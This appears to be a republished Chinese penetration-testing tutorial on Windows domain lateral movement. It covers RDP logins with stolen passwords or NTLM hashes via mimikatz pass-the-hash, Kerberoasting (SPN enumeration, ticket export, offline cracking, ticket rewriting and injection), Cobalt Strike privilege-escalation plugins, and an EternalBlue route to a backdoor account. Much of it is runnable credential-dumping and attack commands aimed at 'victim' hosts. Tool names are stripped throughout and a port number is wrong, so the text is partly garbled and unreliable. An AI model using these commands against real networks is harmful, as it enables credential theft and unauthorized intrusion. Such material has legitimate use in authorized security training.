首页 >> 大全

p69 内网安全-域横向 CobaltStrikeSPNRDP

2023-07-07 大全 45 作者:考证青年

数据来源

SPN( 缩写)_百度百科 ()

演示案例 案例1-域横向移动RDP传递-

除了上述讲到的IPC,WMI,SMB等协议的链接外,获取到的明文密码或HASH密文也可以通过RDP协议进行链接操作

RDP协议连接:判断对方远程桌面服务是否开启(默认:3389),端口扫描判断

1)RDP明文密码链接 要使用RDP协议控制目标的桌面前提: 已经收集到目标主机的远程桌面账号(就是有权限连接到远程桌面的本地或域账号)目标开启了远程桌面服务,默认是3369端口

扫描端口与破解账号:(20条消息) kail - 扫描与爆破_正经人_____的博客-CSDN博客

:(我这里用win7连接做演示)

首先在开启远程桌面

win7的cmd中输入下面的命令

# mstsc是windows系统自带的程序#                      目标端口
mstsc.exe /console /v:192.168.1.61 /admin

Linux:(我是在kali中连接)

# kaili rdesktop 
rdesktop 192.168.1.61:3389

kali最强的渗透神器 -

这里说到了kali顺便给你们介绍个kali最强的渗透神器 -,使用场景:以永恒之蓝漏洞为例,比如你发现你要攻击的目标没有开启3389端口并且你连他的账号密码都不知道,但是你发现目标的445端口是开启的(这个端口默认是开启的,除非受害者的安全意识很好不然不会关闭),这时你就可以使用利用永恒之蓝漏洞对目标进行攻击(这个漏洞就是利用445端口,不同的漏洞利用的端口也不同,如果你有更好的利用方式我们可以一起交流进步)

说一下大概的利用流程:利用永恒之蓝漏洞对目标进行攻击 —>攻击成功就开启目标的3389端口 ->然后在目标主机上创建一个后门账号以后我们就可以利用这个后门账号进行登录受害者的远程桌面

详情的流程我这里就不多说了,我以前写过一篇利用文章你们需要可以参考一下:Kali最强渗透工具- 系统常用渗透工具_正经人_____的博客-CSDN博客

2)RDP密文HASH链接

官网: - /:一个玩安全的小工具

我这里直接在目标主机使用收集账号的hash

使用cmd启动工具

privilege::debug # 调试sekurlsa::ekeys # 获取 aes

sekurlsa::logonpasswords   # 收集PTH攻击方式的NTLM、LM信息

LM是旧版,NILM是新版(我现在用的就是这个)

需要开启 Admin mode,在 8.1和 2012 R2中默认开启,同时如果Win 7 和 2008 R2安装了、补丁也支持;开启命令:

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

开启后运行:

# 打开远程桌面的使用教程
mstsc.exe /restrictedadmin
mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:god /ntlm:442285a710fe49913e8b9a2861781eec "/run:mstsc.exe /restrictedadmin"

net use \\192.168.1.61\c$
dir \\192.168.1.61\c$

案例2-域横向移动SPN服务-探针,请求,破解,重写

黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个目标服务的服务票证。DC在活动目录中查找SPN,并使用与SPN关联的服务帐户加密票证,以便服务能够验证用户是否可以访问。请求的服务票证的加密类型是,这意味着服务帐户的NTLM密码哈希用于加密服务票证。黑客将收到的TGS票据离线进行破解,即可得到目标服务帐号的HASH,这个称之为攻击。如果我们有一个为域用户帐户注册的任意SPN,那么该用户帐户的明文密码的NTLM哈希值就将用于创建服务票证。这就是攻击的关键。

探针(要在域账号中执行下面的命令,普通域或域控账号都可以) 1)查看域所有主机的服务

_内网横向移动是什么意思_横向联网系统

# windows系统自带的setspn可以查询域内的SPN
setspn -q */*           # 获取所有服务

2)查看指定服务的名称

例如:我们要攻击DNS服务,那就专门查看DNS的服务名

setspn -q */* | findstr "DNS"

# 首先打开cmd输入下面的命令清空之前凭证
klist purge# 查看凭证列表,看是否删除成功了
klist

请求(这里要用执行命令,cmd报错)

#
Add-Type -AssemblyName System.IdentityModel# 请求DNS      我这里是: DNS/WIN-I7NPA55KMBD.zs.com
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "xxxx"# 或使用mimikatz去请求
mimikatz.exe "kerberos::ask /target:xxxx"

再次查看凭证列表现在就有东西了

# 查看凭证列表
klist

导出(导出刚才的票证信息)

这里要用都工具

官网: - /:一个玩安全的小工具

mimikatz.exe "kerberos::list /export"

破解

使用 .py 破解

项目地址:

# 用python运行脚本     密码字典     凭证的文件
python tgsrepcrack.py passwd.txt xxxx.kirbi
python .\tgsrepcrack.py .\passwd.txt .\2-40a40000-zhangsan@DNS~WIN-I7NPA55KMBD.zs.com-ZS.COM.kirbi

重写

python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -u 500
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -g 512
mimikatz.exe kerberos::ptt xxxx.kirbi # 将生成的票据注入内存

案例3-域横向移动测试流程一把梭哈-初体验

安装与使用可以参考我之前写的文章:(下面的内容我会写一些之前没有的CS操作)的安装与基础使用安装正经人_____的博客-CSDN博客

大概流程:

启动-配置-监听-执行-上线-提权-信息收集(网络,凭证,定位等)-渗透

1)关于启动及配置讲解

我之前的文章有写,这里就不多说了

2)关于提权及插件加载 1、提权

说明:提权操作是目标有这个漏洞才能提权(如果你也不请求目标主机的漏洞是啥就一个个尝试),而且只能将账号(管理员)提权到账户(系统)

使用插件提权(这使用视频中老师推荐的插件) 先演示一下梼杌: - /taowu--

# 克隆插件到CS根目录
git clone https://github.com/pandasec888/taowu-cobalt-strike.git

直接从上克隆因为网站是外国的容易断开报错,建议还是下载压缩包再拉进入

使用插件

修改一下执行时间,默认是60s才会执行操作

调好之后我们就可以使用这个插件的功能了,如:一键获取目标主机信息(主机硬件、域、ip、FTP等信息)

注意:下面的操作都是要先进入CS的命令行才能看到操作结果

使用插件的权限提升功能

操作都是中文的其他操作自己玩一会就知道了(注意:一定要调一下延时操作,不然默认是60s)

演示:

我的受害者主机是win7最终选择uac-token-提权成功

uac-token-是一种绕过uac方式的攻击,吧地权限提高到高权限,利用一个UAC漏洞,允许非提升进程使用提升进程中窃取的令牌来启动,适用于win7 (参考)

3)关于信息收集命令讲解

我感觉这些命令都不是很好用

net view          # 查看目标的共享
net computers   # 查看域的成员
net dclist 
shell net user /domain

建议还是使用查插件进行信息搜集

4)关于视图自动化功能讲解

操作都是中文的感觉没啥好写的

5)在受害者主机上传自己下载的第三方工具

如果你觉得CS自带的功能与插件无法满足你的需要时,你就可以上传你平时用得第三方工具,如:Ladon

官网: - /Ladon: Ladon大型内网渗透工具

下载地址:

我这里用CS自带的文件管理功能上传文件

运行我们的工具

#      要执行的文件路径                     要扫描的目标网段     
shell C:\Users\zhangsan\Desktop\ladon.exe 192.168.1.0/24

或者直接进入对方的远程桌面执行我们的文件

脚本合集(可以自行在搜索):(参考)

https://github.com/harleyQu1nn/AggressorScripts
https://github.com/Und3rf10w/Aggressor-scripts
https://github.com/001SPARTaN/aggressor_scripts
https://github.com/rasta-mouse/Aggressor-Script
https://github.com/threatexpress/aggressor-scripts
https://github.com/ramen0x3f/AggressorScripts
https://github.com/FortyNorthSecurity/AggressorAssessor
https://github.com/michalkoczwara/aggressor_scripts_collection
https://github.com/ars3n11/Aggressor-Scripts
https://github.com/gaudard/scripts/tree/master/red-team/aggressor
https://github.com/bluscreenofjeff/AggressorScripts
https://github.com/vysecurity/Aggressor-VYSEC
https://github.com/killswitch-GUI/CobaltStrike-ToolKit
https://github.com/rsmudge/ElevateKit (第三方提权攻击)
https://github.com/QAX-A-Team/CobaltStrike-Toolset
https://github.com/DeEpinGh0st/Erebus (Erebus CobaltStrike后渗透测试插件,持续更新)
https://github.com/branthale/CobaltStrikeCNA
https://github.com/pandasec888/taowu-cobalt-strike(仓库已关闭)

涉及资源:(参考)

关于我们

最火推荐

小编推荐

联系我们


版权声明:本站内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 88@qq.com 举报,一经查实,本站将立刻删除。备案号:桂ICP备2021009421号
Powered By Z-BlogPHP.
复制成功
微信号:
我知道了